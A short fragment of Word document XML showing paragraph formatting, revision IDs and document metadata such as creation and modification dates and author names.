        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="527"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5B2BB0"/>
    <w:rsid w:val="19721C0C"/>
    <w:rsid w:val="32A37061"/>
    <w:rsid w:val="A53E1A60"/>
    <w:rsid w:val="F5B94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2023-05-24T07:09:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>哈哈哈哈</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-24T15:01:34Z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722FFD0B648BC82F7DB26D640158D000</vt:lpwstr>
  </property>
</Properties>
</file>